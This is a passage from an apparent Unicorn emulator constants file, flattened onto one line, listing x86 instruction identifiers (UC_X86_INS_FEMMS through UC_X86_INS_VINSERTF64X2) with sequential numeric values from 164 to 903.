UC_X86_INS_FEMMS = 164 + UC_X86_INS_FFREE = 165 + UC_X86_INS_FICOM = 166 + UC_X86_INS_FICOMP = 167 + UC_X86_INS_FINCSTP = 168 + UC_X86_INS_FLDCW = 169 + UC_X86_INS_FLDENV = 170 + UC_X86_INS_FLDL2E = 171 + UC_X86_INS_FLDL2T = 172 + UC_X86_INS_FLDLG2 = 173 + UC_X86_INS_FLDLN2 = 174 + UC_X86_INS_FLDPI = 175 + UC_X86_INS_FNCLEX = 176 + UC_X86_INS_FNINIT = 177 + UC_X86_INS_FNOP = 178 + UC_X86_INS_FNSTCW = 179 + UC_X86_INS_FNSTSW = 180 + UC_X86_INS_FPATAN = 181 + UC_X86_INS_FPREM = 182 + UC_X86_INS_FPREM1 = 183 + UC_X86_INS_FPTAN = 184 + UC_X86_INS_FFREEP = 185 + UC_X86_INS_FRNDINT = 186 + UC_X86_INS_FRSTOR = 187 + UC_X86_INS_FNSAVE = 188 + UC_X86_INS_FSCALE = 189 + UC_X86_INS_FSETPM = 190 + UC_X86_INS_FSINCOS = 191 + UC_X86_INS_FNSTENV = 192 + UC_X86_INS_FXAM = 193 + UC_X86_INS_FXRSTOR = 194 + UC_X86_INS_FXRSTOR64 = 195 + UC_X86_INS_FXSAVE = 196 + UC_X86_INS_FXSAVE64 = 197 + UC_X86_INS_FXTRACT = 198 + UC_X86_INS_FYL2X = 199 + UC_X86_INS_FYL2XP1 = 200 + UC_X86_INS_MOVAPD = 201 + UC_X86_INS_MOVAPS = 202 + UC_X86_INS_ORPD = 203 + UC_X86_INS_ORPS = 204 + UC_X86_INS_VMOVAPD = 205 + UC_X86_INS_VMOVAPS = 206 + UC_X86_INS_XORPD = 207 + UC_X86_INS_XORPS = 208 + UC_X86_INS_GETSEC = 209 + UC_X86_INS_HADDPD = 210 + UC_X86_INS_HADDPS = 211 + UC_X86_INS_HLT = 212 + UC_X86_INS_HSUBPD = 213 + UC_X86_INS_HSUBPS = 214 + UC_X86_INS_IDIV = 215 + UC_X86_INS_FILD = 216 + UC_X86_INS_IMUL = 217 + UC_X86_INS_IN = 218 + UC_X86_INS_INC = 219 + UC_X86_INS_INSB = 220 + UC_X86_INS_INSERTPS = 221 + UC_X86_INS_INSERTQ = 222 + UC_X86_INS_INSD = 223 + UC_X86_INS_INSW = 224 + UC_X86_INS_INT = 225 + UC_X86_INS_INT1 = 226 + UC_X86_INS_INT3 = 227 + UC_X86_INS_INTO = 228 + UC_X86_INS_INVD = 229 + UC_X86_INS_INVEPT = 230 + UC_X86_INS_INVLPG = 231 + UC_X86_INS_INVLPGA = 232 + UC_X86_INS_INVPCID = 233 + UC_X86_INS_INVVPID = 234 + UC_X86_INS_IRET = 235 + UC_X86_INS_IRETD = 236 + UC_X86_INS_IRETQ = 237 + UC_X86_INS_FISTTP = 238 + UC_X86_INS_FIST = 239 + UC_X86_INS_FISTP = 240 + UC_X86_INS_UCOMISD = 241 + UC_X86_INS_UCOMISS = 242 + UC_X86_INS_VCOMISD = 243 + UC_X86_INS_VCOMISS = 244 + UC_X86_INS_VCVTSD2SS = 245 + UC_X86_INS_VCVTSI2SD = 246 + UC_X86_INS_VCVTSI2SS = 247 + UC_X86_INS_VCVTSS2SD = 248 + UC_X86_INS_VCVTTSD2SI = 249 + UC_X86_INS_VCVTTSD2USI = 250 + UC_X86_INS_VCVTTSS2SI = 251 + UC_X86_INS_VCVTTSS2USI = 252 + UC_X86_INS_VCVTUSI2SD = 253 + UC_X86_INS_VCVTUSI2SS = 254 + UC_X86_INS_VUCOMISD = 255 + UC_X86_INS_VUCOMISS = 256 + UC_X86_INS_JAE = 257 + UC_X86_INS_JA = 258 + UC_X86_INS_JBE = 259 + UC_X86_INS_JB = 260 + UC_X86_INS_JCXZ = 261 + UC_X86_INS_JECXZ = 262 + UC_X86_INS_JE = 263 + UC_X86_INS_JGE = 264 + UC_X86_INS_JG = 265 + UC_X86_INS_JLE = 266 + UC_X86_INS_JL = 267 + UC_X86_INS_JMP = 268 + UC_X86_INS_JNE = 269 + UC_X86_INS_JNO = 270 + UC_X86_INS_JNP = 271 + UC_X86_INS_JNS = 272 + UC_X86_INS_JO = 273 + UC_X86_INS_JP = 274 + UC_X86_INS_JRCXZ = 275 + UC_X86_INS_JS = 276 + UC_X86_INS_KANDB = 277 + UC_X86_INS_KANDD = 278 + UC_X86_INS_KANDNB = 279 + UC_X86_INS_KANDND = 280 + UC_X86_INS_KANDNQ = 281 + UC_X86_INS_KANDNW = 282 + UC_X86_INS_KANDQ = 283 + UC_X86_INS_KANDW = 284 + UC_X86_INS_KMOVB = 285 + UC_X86_INS_KMOVD = 286 + UC_X86_INS_KMOVQ = 287 + UC_X86_INS_KMOVW = 288 + UC_X86_INS_KNOTB = 289 + UC_X86_INS_KNOTD = 290 + UC_X86_INS_KNOTQ = 291 + UC_X86_INS_KNOTW = 292 + UC_X86_INS_KORB = 293 + UC_X86_INS_KORD = 294 + UC_X86_INS_KORQ = 295 + UC_X86_INS_KORTESTB = 296 + UC_X86_INS_KORTESTD = 297 + UC_X86_INS_KORTESTQ = 298 + UC_X86_INS_KORTESTW = 299 + UC_X86_INS_KORW = 300 + UC_X86_INS_KSHIFTLB = 301 + UC_X86_INS_KSHIFTLD = 302 + UC_X86_INS_KSHIFTLQ = 303 + UC_X86_INS_KSHIFTLW = 304 + UC_X86_INS_KSHIFTRB = 305 + UC_X86_INS_KSHIFTRD = 306 + UC_X86_INS_KSHIFTRQ = 307 + UC_X86_INS_KSHIFTRW = 308 + UC_X86_INS_KUNPCKBW = 309 + UC_X86_INS_KXNORB = 310 + UC_X86_INS_KXNORD = 311 + UC_X86_INS_KXNORQ = 312 + UC_X86_INS_KXNORW = 313 + UC_X86_INS_KXORB = 314 + UC_X86_INS_KXORD = 315 + UC_X86_INS_KXORQ = 316 + UC_X86_INS_KXORW = 317 + UC_X86_INS_LAHF = 318 + UC_X86_INS_LAR = 319 + UC_X86_INS_LDDQU = 320 + UC_X86_INS_LDMXCSR = 321 + UC_X86_INS_LDS = 322 + UC_X86_INS_FLDZ = 323 + UC_X86_INS_FLD1 = 324 + UC_X86_INS_FLD = 325 + UC_X86_INS_LEA = 326 + UC_X86_INS_LEAVE = 327 + UC_X86_INS_LES = 328 + UC_X86_INS_LFENCE = 329 + UC_X86_INS_LFS = 330 + UC_X86_INS_LGDT = 331 + UC_X86_INS_LGS = 332 + UC_X86_INS_LIDT = 333 + UC_X86_INS_LLDT = 334 + UC_X86_INS_LMSW = 335 + UC_X86_INS_OR = 336 + UC_X86_INS_SUB = 337 + UC_X86_INS_XOR = 338 + UC_X86_INS_LODSB = 339 + UC_X86_INS_LODSD = 340 + UC_X86_INS_LODSQ = 341 + UC_X86_INS_LODSW = 342 + UC_X86_INS_LOOP = 343 + UC_X86_INS_LOOPE = 344 + UC_X86_INS_LOOPNE = 345 + UC_X86_INS_RETF = 346 + UC_X86_INS_RETFQ = 347 + UC_X86_INS_LSL = 348 + UC_X86_INS_LSS = 349 + UC_X86_INS_LTR = 350 + UC_X86_INS_XADD = 351 + UC_X86_INS_LZCNT = 352 + UC_X86_INS_MASKMOVDQU = 353 + UC_X86_INS_MAXPD = 354 + UC_X86_INS_MAXPS = 355 + UC_X86_INS_MAXSD = 356 + UC_X86_INS_MAXSS = 357 + UC_X86_INS_MFENCE = 358 + UC_X86_INS_MINPD = 359 + UC_X86_INS_MINPS = 360 + UC_X86_INS_MINSD = 361 + UC_X86_INS_MINSS = 362 + UC_X86_INS_CVTPD2PI = 363 + UC_X86_INS_CVTPI2PD = 364 + UC_X86_INS_CVTPI2PS = 365 + UC_X86_INS_CVTPS2PI = 366 + UC_X86_INS_CVTTPD2PI = 367 + UC_X86_INS_CVTTPS2PI = 368 + UC_X86_INS_EMMS = 369 + UC_X86_INS_MASKMOVQ = 370 + UC_X86_INS_MOVD = 371 + UC_X86_INS_MOVDQ2Q = 372 + UC_X86_INS_MOVNTQ = 373 + UC_X86_INS_MOVQ2DQ = 374 + UC_X86_INS_MOVQ = 375 + UC_X86_INS_PABSB = 376 + UC_X86_INS_PABSD = 377 + UC_X86_INS_PABSW = 378 + UC_X86_INS_PACKSSDW = 379 + UC_X86_INS_PACKSSWB = 380 + UC_X86_INS_PACKUSWB = 381 + UC_X86_INS_PADDB = 382 + UC_X86_INS_PADDD = 383 + UC_X86_INS_PADDQ = 384 + UC_X86_INS_PADDSB = 385 + UC_X86_INS_PADDSW = 386 + UC_X86_INS_PADDUSB = 387 + UC_X86_INS_PADDUSW = 388 + UC_X86_INS_PADDW = 389 + UC_X86_INS_PALIGNR = 390 + UC_X86_INS_PANDN = 391 + UC_X86_INS_PAND = 392 + UC_X86_INS_PAVGB = 393 + UC_X86_INS_PAVGW = 394 + UC_X86_INS_PCMPEQB = 395 + UC_X86_INS_PCMPEQD = 396 + UC_X86_INS_PCMPEQW = 397 + UC_X86_INS_PCMPGTB = 398 + UC_X86_INS_PCMPGTD = 399 + UC_X86_INS_PCMPGTW = 400 + UC_X86_INS_PEXTRW = 401 + UC_X86_INS_PHADDSW = 402 + UC_X86_INS_PHADDW = 403 + UC_X86_INS_PHADDD = 404 + UC_X86_INS_PHSUBD = 405 + UC_X86_INS_PHSUBSW = 406 + UC_X86_INS_PHSUBW = 407 + UC_X86_INS_PINSRW = 408 + UC_X86_INS_PMADDUBSW = 409 + UC_X86_INS_PMADDWD = 410 + UC_X86_INS_PMAXSW = 411 + UC_X86_INS_PMAXUB = 412 + UC_X86_INS_PMINSW = 413 + UC_X86_INS_PMINUB = 414 + UC_X86_INS_PMOVMSKB = 415 + UC_X86_INS_PMULHRSW = 416 + UC_X86_INS_PMULHUW = 417 + UC_X86_INS_PMULHW = 418 + UC_X86_INS_PMULLW = 419 + UC_X86_INS_PMULUDQ = 420 + UC_X86_INS_POR = 421 + UC_X86_INS_PSADBW = 422 + UC_X86_INS_PSHUFB = 423 + UC_X86_INS_PSHUFW = 424 + UC_X86_INS_PSIGNB = 425 + UC_X86_INS_PSIGND = 426 + UC_X86_INS_PSIGNW = 427 + UC_X86_INS_PSLLD = 428 + UC_X86_INS_PSLLQ = 429 + UC_X86_INS_PSLLW = 430 + UC_X86_INS_PSRAD = 431 + UC_X86_INS_PSRAW = 432 + UC_X86_INS_PSRLD = 433 + UC_X86_INS_PSRLQ = 434 + UC_X86_INS_PSRLW = 435 + UC_X86_INS_PSUBB = 436 + UC_X86_INS_PSUBD = 437 + UC_X86_INS_PSUBQ = 438 + UC_X86_INS_PSUBSB = 439 + UC_X86_INS_PSUBSW = 440 + UC_X86_INS_PSUBUSB = 441 + UC_X86_INS_PSUBUSW = 442 + UC_X86_INS_PSUBW = 443 + UC_X86_INS_PUNPCKHBW = 444 + UC_X86_INS_PUNPCKHDQ = 445 + UC_X86_INS_PUNPCKHWD = 446 + UC_X86_INS_PUNPCKLBW = 447 + UC_X86_INS_PUNPCKLDQ = 448 + UC_X86_INS_PUNPCKLWD = 449 + UC_X86_INS_PXOR = 450 + UC_X86_INS_MONITOR = 451 + UC_X86_INS_MONTMUL = 452 + UC_X86_INS_MOV = 453 + UC_X86_INS_MOVABS = 454 + UC_X86_INS_MOVBE = 455 + UC_X86_INS_MOVDDUP = 456 + UC_X86_INS_MOVDQA = 457 + UC_X86_INS_MOVDQU = 458 + UC_X86_INS_MOVHLPS = 459 + UC_X86_INS_MOVHPD = 460 + UC_X86_INS_MOVHPS = 461 + UC_X86_INS_MOVLHPS = 462 + UC_X86_INS_MOVLPD = 463 + UC_X86_INS_MOVLPS = 464 + UC_X86_INS_MOVMSKPD = 465 + UC_X86_INS_MOVMSKPS = 466 + UC_X86_INS_MOVNTDQA = 467 + UC_X86_INS_MOVNTDQ = 468 + UC_X86_INS_MOVNTI = 469 + UC_X86_INS_MOVNTPD = 470 + UC_X86_INS_MOVNTPS = 471 + UC_X86_INS_MOVNTSD = 472 + UC_X86_INS_MOVNTSS = 473 + UC_X86_INS_MOVSB = 474 + UC_X86_INS_MOVSD = 475 + UC_X86_INS_MOVSHDUP = 476 + UC_X86_INS_MOVSLDUP = 477 + UC_X86_INS_MOVSQ = 478 + UC_X86_INS_MOVSS = 479 + UC_X86_INS_MOVSW = 480 + UC_X86_INS_MOVSX = 481 + UC_X86_INS_MOVSXD = 482 + UC_X86_INS_MOVUPD = 483 + UC_X86_INS_MOVUPS = 484 + UC_X86_INS_MOVZX = 485 + UC_X86_INS_MPSADBW = 486 + UC_X86_INS_MUL = 487 + UC_X86_INS_MULPD = 488 + UC_X86_INS_MULPS = 489 + UC_X86_INS_MULSD = 490 + UC_X86_INS_MULSS = 491 + UC_X86_INS_MULX = 492 + UC_X86_INS_FMUL = 493 + UC_X86_INS_FIMUL = 494 + UC_X86_INS_FMULP = 495 + UC_X86_INS_MWAIT = 496 + UC_X86_INS_NEG = 497 + UC_X86_INS_NOP = 498 + UC_X86_INS_NOT = 499 + UC_X86_INS_OUT = 500 + UC_X86_INS_OUTSB = 501 + UC_X86_INS_OUTSD = 502 + UC_X86_INS_OUTSW = 503 + UC_X86_INS_PACKUSDW = 504 + UC_X86_INS_PAUSE = 505 + UC_X86_INS_PAVGUSB = 506 + UC_X86_INS_PBLENDVB = 507 + UC_X86_INS_PBLENDW = 508 + UC_X86_INS_PCLMULQDQ = 509 + UC_X86_INS_PCMPEQQ = 510 + UC_X86_INS_PCMPESTRI = 511 + UC_X86_INS_PCMPESTRM = 512 + UC_X86_INS_PCMPGTQ = 513 + UC_X86_INS_PCMPISTRI = 514 + UC_X86_INS_PCMPISTRM = 515 + UC_X86_INS_PCOMMIT = 516 + UC_X86_INS_PDEP = 517 + UC_X86_INS_PEXT = 518 + UC_X86_INS_PEXTRB = 519 + UC_X86_INS_PEXTRD = 520 + UC_X86_INS_PEXTRQ = 521 + UC_X86_INS_PF2ID = 522 + UC_X86_INS_PF2IW = 523 + UC_X86_INS_PFACC = 524 + UC_X86_INS_PFADD = 525 + UC_X86_INS_PFCMPEQ = 526 + UC_X86_INS_PFCMPGE = 527 + UC_X86_INS_PFCMPGT = 528 + UC_X86_INS_PFMAX = 529 + UC_X86_INS_PFMIN = 530 + UC_X86_INS_PFMUL = 531 + UC_X86_INS_PFNACC = 532 + UC_X86_INS_PFPNACC = 533 + UC_X86_INS_PFRCPIT1 = 534 + UC_X86_INS_PFRCPIT2 = 535 + UC_X86_INS_PFRCP = 536 + UC_X86_INS_PFRSQIT1 = 537 + UC_X86_INS_PFRSQRT = 538 + UC_X86_INS_PFSUBR = 539 + UC_X86_INS_PFSUB = 540 + UC_X86_INS_PHMINPOSUW = 541 + UC_X86_INS_PI2FD = 542 + UC_X86_INS_PI2FW = 543 + UC_X86_INS_PINSRB = 544 + UC_X86_INS_PINSRD = 545 + UC_X86_INS_PINSRQ = 546 + UC_X86_INS_PMAXSB = 547 + UC_X86_INS_PMAXSD = 548 + UC_X86_INS_PMAXUD = 549 + UC_X86_INS_PMAXUW = 550 + UC_X86_INS_PMINSB = 551 + UC_X86_INS_PMINSD = 552 + UC_X86_INS_PMINUD = 553 + UC_X86_INS_PMINUW = 554 + UC_X86_INS_PMOVSXBD = 555 + UC_X86_INS_PMOVSXBQ = 556 + UC_X86_INS_PMOVSXBW = 557 + UC_X86_INS_PMOVSXDQ = 558 + UC_X86_INS_PMOVSXWD = 559 + UC_X86_INS_PMOVSXWQ = 560 + UC_X86_INS_PMOVZXBD = 561 + UC_X86_INS_PMOVZXBQ = 562 + UC_X86_INS_PMOVZXBW = 563 + UC_X86_INS_PMOVZXDQ = 564 + UC_X86_INS_PMOVZXWD = 565 + UC_X86_INS_PMOVZXWQ = 566 + UC_X86_INS_PMULDQ = 567 + UC_X86_INS_PMULHRW = 568 + UC_X86_INS_PMULLD = 569 + UC_X86_INS_POP = 570 + UC_X86_INS_POPAW = 571 + UC_X86_INS_POPAL = 572 + UC_X86_INS_POPCNT = 573 + UC_X86_INS_POPF = 574 + UC_X86_INS_POPFD = 575 + UC_X86_INS_POPFQ = 576 + UC_X86_INS_PREFETCH = 577 + UC_X86_INS_PREFETCHNTA = 578 + UC_X86_INS_PREFETCHT0 = 579 + UC_X86_INS_PREFETCHT1 = 580 + UC_X86_INS_PREFETCHT2 = 581 + UC_X86_INS_PREFETCHW = 582 + UC_X86_INS_PSHUFD = 583 + UC_X86_INS_PSHUFHW = 584 + UC_X86_INS_PSHUFLW = 585 + UC_X86_INS_PSLLDQ = 586 + UC_X86_INS_PSRLDQ = 587 + UC_X86_INS_PSWAPD = 588 + UC_X86_INS_PTEST = 589 + UC_X86_INS_PUNPCKHQDQ = 590 + UC_X86_INS_PUNPCKLQDQ = 591 + UC_X86_INS_PUSH = 592 + UC_X86_INS_PUSHAW = 593 + UC_X86_INS_PUSHAL = 594 + UC_X86_INS_PUSHF = 595 + UC_X86_INS_PUSHFD = 596 + UC_X86_INS_PUSHFQ = 597 + UC_X86_INS_RCL = 598 + UC_X86_INS_RCPPS = 599 + UC_X86_INS_RCPSS = 600 + UC_X86_INS_RCR = 601 + UC_X86_INS_RDFSBASE = 602 + UC_X86_INS_RDGSBASE = 603 + UC_X86_INS_RDMSR = 604 + UC_X86_INS_RDPMC = 605 + UC_X86_INS_RDRAND = 606 + UC_X86_INS_RDSEED = 607 + UC_X86_INS_RDTSC = 608 + UC_X86_INS_RDTSCP = 609 + UC_X86_INS_ROL = 610 + UC_X86_INS_ROR = 611 + UC_X86_INS_RORX = 612 + UC_X86_INS_ROUNDPD = 613 + UC_X86_INS_ROUNDPS = 614 + UC_X86_INS_ROUNDSD = 615 + UC_X86_INS_ROUNDSS = 616 + UC_X86_INS_RSM = 617 + UC_X86_INS_RSQRTPS = 618 + UC_X86_INS_RSQRTSS = 619 + UC_X86_INS_SAHF = 620 + UC_X86_INS_SAL = 621 + UC_X86_INS_SALC = 622 + UC_X86_INS_SAR = 623 + UC_X86_INS_SARX = 624 + UC_X86_INS_SBB = 625 + UC_X86_INS_SCASB = 626 + UC_X86_INS_SCASD = 627 + UC_X86_INS_SCASQ = 628 + UC_X86_INS_SCASW = 629 + UC_X86_INS_SETAE = 630 + UC_X86_INS_SETA = 631 + UC_X86_INS_SETBE = 632 + UC_X86_INS_SETB = 633 + UC_X86_INS_SETE = 634 + UC_X86_INS_SETGE = 635 + UC_X86_INS_SETG = 636 + UC_X86_INS_SETLE = 637 + UC_X86_INS_SETL = 638 + UC_X86_INS_SETNE = 639 + UC_X86_INS_SETNO = 640 + UC_X86_INS_SETNP = 641 + UC_X86_INS_SETNS = 642 + UC_X86_INS_SETO = 643 + UC_X86_INS_SETP = 644 + UC_X86_INS_SETS = 645 + UC_X86_INS_SFENCE = 646 + UC_X86_INS_SGDT = 647 + UC_X86_INS_SHA1MSG1 = 648 + UC_X86_INS_SHA1MSG2 = 649 + UC_X86_INS_SHA1NEXTE = 650 + UC_X86_INS_SHA1RNDS4 = 651 + UC_X86_INS_SHA256MSG1 = 652 + UC_X86_INS_SHA256MSG2 = 653 + UC_X86_INS_SHA256RNDS2 = 654 + UC_X86_INS_SHL = 655 + UC_X86_INS_SHLD = 656 + UC_X86_INS_SHLX = 657 + UC_X86_INS_SHR = 658 + UC_X86_INS_SHRD = 659 + UC_X86_INS_SHRX = 660 + UC_X86_INS_SHUFPD = 661 + UC_X86_INS_SHUFPS = 662 + UC_X86_INS_SIDT = 663 + UC_X86_INS_FSIN = 664 + UC_X86_INS_SKINIT = 665 + UC_X86_INS_SLDT = 666 + UC_X86_INS_SMSW = 667 + UC_X86_INS_SQRTPD = 668 + UC_X86_INS_SQRTPS = 669 + UC_X86_INS_SQRTSD = 670 + UC_X86_INS_SQRTSS = 671 + UC_X86_INS_FSQRT = 672 + UC_X86_INS_STAC = 673 + UC_X86_INS_STC = 674 + UC_X86_INS_STD = 675 + UC_X86_INS_STGI = 676 + UC_X86_INS_STI = 677 + UC_X86_INS_STMXCSR = 678 + UC_X86_INS_STOSB = 679 + UC_X86_INS_STOSD = 680 + UC_X86_INS_STOSQ = 681 + UC_X86_INS_STOSW = 682 + UC_X86_INS_STR = 683 + UC_X86_INS_FST = 684 + UC_X86_INS_FSTP = 685 + UC_X86_INS_FSTPNCE = 686 + UC_X86_INS_FXCH = 687 + UC_X86_INS_SUBPD = 688 + UC_X86_INS_SUBPS = 689 + UC_X86_INS_FSUBR = 690 + UC_X86_INS_FISUBR = 691 + UC_X86_INS_FSUBRP = 692 + UC_X86_INS_SUBSD = 693 + UC_X86_INS_SUBSS = 694 + UC_X86_INS_FSUB = 695 + UC_X86_INS_FISUB = 696 + UC_X86_INS_FSUBP = 697 + UC_X86_INS_SWAPGS = 698 + UC_X86_INS_SYSCALL = 699 + UC_X86_INS_SYSENTER = 700 + UC_X86_INS_SYSEXIT = 701 + UC_X86_INS_SYSRET = 702 + UC_X86_INS_T1MSKC = 703 + UC_X86_INS_TEST = 704 + UC_X86_INS_UD2 = 705 + UC_X86_INS_FTST = 706 + UC_X86_INS_TZCNT = 707 + UC_X86_INS_TZMSK = 708 + UC_X86_INS_FUCOMPI = 709 + UC_X86_INS_FUCOMI = 710 + UC_X86_INS_FUCOMPP = 711 + UC_X86_INS_FUCOMP = 712 + UC_X86_INS_FUCOM = 713 + UC_X86_INS_UD2B = 714 + UC_X86_INS_UNPCKHPD = 715 + UC_X86_INS_UNPCKHPS = 716 + UC_X86_INS_UNPCKLPD = 717 + UC_X86_INS_UNPCKLPS = 718 + UC_X86_INS_VADDPD = 719 + UC_X86_INS_VADDPS = 720 + UC_X86_INS_VADDSD = 721 + UC_X86_INS_VADDSS = 722 + UC_X86_INS_VADDSUBPD = 723 + UC_X86_INS_VADDSUBPS = 724 + UC_X86_INS_VAESDECLAST = 725 + UC_X86_INS_VAESDEC = 726 + UC_X86_INS_VAESENCLAST = 727 + UC_X86_INS_VAESENC = 728 + UC_X86_INS_VAESIMC = 729 + UC_X86_INS_VAESKEYGENASSIST = 730 + UC_X86_INS_VALIGND = 731 + UC_X86_INS_VALIGNQ = 732 + UC_X86_INS_VANDNPD = 733 + UC_X86_INS_VANDNPS = 734 + UC_X86_INS_VANDPD = 735 + UC_X86_INS_VANDPS = 736 + UC_X86_INS_VBLENDMPD = 737 + UC_X86_INS_VBLENDMPS = 738 + UC_X86_INS_VBLENDPD = 739 + UC_X86_INS_VBLENDPS = 740 + UC_X86_INS_VBLENDVPD = 741 + UC_X86_INS_VBLENDVPS = 742 + UC_X86_INS_VBROADCASTF128 = 743 + UC_X86_INS_VBROADCASTI32X4 = 744 + UC_X86_INS_VBROADCASTI64X4 = 745 + UC_X86_INS_VBROADCASTSD = 746 + UC_X86_INS_VBROADCASTSS = 747 + UC_X86_INS_VCMPPD = 748 + UC_X86_INS_VCMPPS = 749 + UC_X86_INS_VCMPSD = 750 + UC_X86_INS_VCMPSS = 751 + UC_X86_INS_VCOMPRESSPD = 752 + UC_X86_INS_VCOMPRESSPS = 753 + UC_X86_INS_VCVTDQ2PD = 754 + UC_X86_INS_VCVTDQ2PS = 755 + UC_X86_INS_VCVTPD2DQX = 756 + UC_X86_INS_VCVTPD2DQ = 757 + UC_X86_INS_VCVTPD2PSX = 758 + UC_X86_INS_VCVTPD2PS = 759 + UC_X86_INS_VCVTPD2UDQ = 760 + UC_X86_INS_VCVTPH2PS = 761 + UC_X86_INS_VCVTPS2DQ = 762 + UC_X86_INS_VCVTPS2PD = 763 + UC_X86_INS_VCVTPS2PH = 764 + UC_X86_INS_VCVTPS2UDQ = 765 + UC_X86_INS_VCVTSD2SI = 766 + UC_X86_INS_VCVTSD2USI = 767 + UC_X86_INS_VCVTSS2SI = 768 + UC_X86_INS_VCVTSS2USI = 769 + UC_X86_INS_VCVTTPD2DQX = 770 + UC_X86_INS_VCVTTPD2DQ = 771 + UC_X86_INS_VCVTTPD2UDQ = 772 + UC_X86_INS_VCVTTPS2DQ = 773 + UC_X86_INS_VCVTTPS2UDQ = 774 + UC_X86_INS_VCVTUDQ2PD = 775 + UC_X86_INS_VCVTUDQ2PS = 776 + UC_X86_INS_VDIVPD = 777 + UC_X86_INS_VDIVPS = 778 + UC_X86_INS_VDIVSD = 779 + UC_X86_INS_VDIVSS = 780 + UC_X86_INS_VDPPD = 781 + UC_X86_INS_VDPPS = 782 + UC_X86_INS_VERR = 783 + UC_X86_INS_VERW = 784 + UC_X86_INS_VEXP2PD = 785 + UC_X86_INS_VEXP2PS = 786 + UC_X86_INS_VEXPANDPD = 787 + UC_X86_INS_VEXPANDPS = 788 + UC_X86_INS_VEXTRACTF128 = 789 + UC_X86_INS_VEXTRACTF32X4 = 790 + UC_X86_INS_VEXTRACTF64X4 = 791 + UC_X86_INS_VEXTRACTI128 = 792 + UC_X86_INS_VEXTRACTI32X4 = 793 + UC_X86_INS_VEXTRACTI64X4 = 794 + UC_X86_INS_VEXTRACTPS = 795 + UC_X86_INS_VFMADD132PD = 796 + UC_X86_INS_VFMADD132PS = 797 + UC_X86_INS_VFMADDPD = 798 + UC_X86_INS_VFMADD213PD = 799 + UC_X86_INS_VFMADD231PD = 800 + UC_X86_INS_VFMADDPS = 801 + UC_X86_INS_VFMADD213PS = 802 + UC_X86_INS_VFMADD231PS = 803 + UC_X86_INS_VFMADDSD = 804 + UC_X86_INS_VFMADD213SD = 805 + UC_X86_INS_VFMADD132SD = 806 + UC_X86_INS_VFMADD231SD = 807 + UC_X86_INS_VFMADDSS = 808 + UC_X86_INS_VFMADD213SS = 809 + UC_X86_INS_VFMADD132SS = 810 + UC_X86_INS_VFMADD231SS = 811 + UC_X86_INS_VFMADDSUB132PD = 812 + UC_X86_INS_VFMADDSUB132PS = 813 + UC_X86_INS_VFMADDSUBPD = 814 + UC_X86_INS_VFMADDSUB213PD = 815 + UC_X86_INS_VFMADDSUB231PD = 816 + UC_X86_INS_VFMADDSUBPS = 817 + UC_X86_INS_VFMADDSUB213PS = 818 + UC_X86_INS_VFMADDSUB231PS = 819 + UC_X86_INS_VFMSUB132PD = 820 + UC_X86_INS_VFMSUB132PS = 821 + UC_X86_INS_VFMSUBADD132PD = 822 + UC_X86_INS_VFMSUBADD132PS = 823 + UC_X86_INS_VFMSUBADDPD = 824 + UC_X86_INS_VFMSUBADD213PD = 825 + UC_X86_INS_VFMSUBADD231PD = 826 + UC_X86_INS_VFMSUBADDPS = 827 + UC_X86_INS_VFMSUBADD213PS = 828 + UC_X86_INS_VFMSUBADD231PS = 829 + UC_X86_INS_VFMSUBPD = 830 + UC_X86_INS_VFMSUB213PD = 831 + UC_X86_INS_VFMSUB231PD = 832 + UC_X86_INS_VFMSUBPS = 833 + UC_X86_INS_VFMSUB213PS = 834 + UC_X86_INS_VFMSUB231PS = 835 + UC_X86_INS_VFMSUBSD = 836 + UC_X86_INS_VFMSUB213SD = 837 + UC_X86_INS_VFMSUB132SD = 838 + UC_X86_INS_VFMSUB231SD = 839 + UC_X86_INS_VFMSUBSS = 840 + UC_X86_INS_VFMSUB213SS = 841 + UC_X86_INS_VFMSUB132SS = 842 + UC_X86_INS_VFMSUB231SS = 843 + UC_X86_INS_VFNMADD132PD = 844 + UC_X86_INS_VFNMADD132PS = 845 + UC_X86_INS_VFNMADDPD = 846 + UC_X86_INS_VFNMADD213PD = 847 + UC_X86_INS_VFNMADD231PD = 848 + UC_X86_INS_VFNMADDPS = 849 + UC_X86_INS_VFNMADD213PS = 850 + UC_X86_INS_VFNMADD231PS = 851 + UC_X86_INS_VFNMADDSD = 852 + UC_X86_INS_VFNMADD213SD = 853 + UC_X86_INS_VFNMADD132SD = 854 + UC_X86_INS_VFNMADD231SD = 855 + UC_X86_INS_VFNMADDSS = 856 + UC_X86_INS_VFNMADD213SS = 857 + UC_X86_INS_VFNMADD132SS = 858 + UC_X86_INS_VFNMADD231SS = 859 + UC_X86_INS_VFNMSUB132PD = 860 + UC_X86_INS_VFNMSUB132PS = 861 + UC_X86_INS_VFNMSUBPD = 862 + UC_X86_INS_VFNMSUB213PD = 863 + UC_X86_INS_VFNMSUB231PD = 864 + UC_X86_INS_VFNMSUBPS = 865 + UC_X86_INS_VFNMSUB213PS = 866 + UC_X86_INS_VFNMSUB231PS = 867 + UC_X86_INS_VFNMSUBSD = 868 + UC_X86_INS_VFNMSUB213SD = 869 + UC_X86_INS_VFNMSUB132SD = 870 + UC_X86_INS_VFNMSUB231SD = 871 + UC_X86_INS_VFNMSUBSS = 872 + UC_X86_INS_VFNMSUB213SS = 873 + UC_X86_INS_VFNMSUB132SS = 874 + UC_X86_INS_VFNMSUB231SS = 875 + UC_X86_INS_VFRCZPD = 876 + UC_X86_INS_VFRCZPS = 877 + UC_X86_INS_VFRCZSD = 878 + UC_X86_INS_VFRCZSS = 879 + UC_X86_INS_VORPD = 880 + UC_X86_INS_VORPS = 881 + UC_X86_INS_VXORPD = 882 + UC_X86_INS_VXORPS = 883 + UC_X86_INS_VGATHERDPD = 884 + UC_X86_INS_VGATHERDPS = 885 + UC_X86_INS_VGATHERPF0DPD = 886 + UC_X86_INS_VGATHERPF0DPS = 887 + UC_X86_INS_VGATHERPF0QPD = 888 + UC_X86_INS_VGATHERPF0QPS = 889 + UC_X86_INS_VGATHERPF1DPD = 890 + UC_X86_INS_VGATHERPF1DPS = 891 + UC_X86_INS_VGATHERPF1QPD = 892 + UC_X86_INS_VGATHERPF1QPS = 893 + UC_X86_INS_VGATHERQPD = 894 + UC_X86_INS_VGATHERQPS = 895 + UC_X86_INS_VHADDPD = 896 + UC_X86_INS_VHADDPS = 897 + UC_X86_INS_VHSUBPD = 898 + UC_X86_INS_VHSUBPS = 899 + UC_X86_INS_VINSERTF128 = 900 + UC_X86_INS_VINSERTF32X4 = 901 + UC_X86_INS_VINSERTF32X8 = 902 + UC_X86_INS_VINSERTF64X2 = 903 + 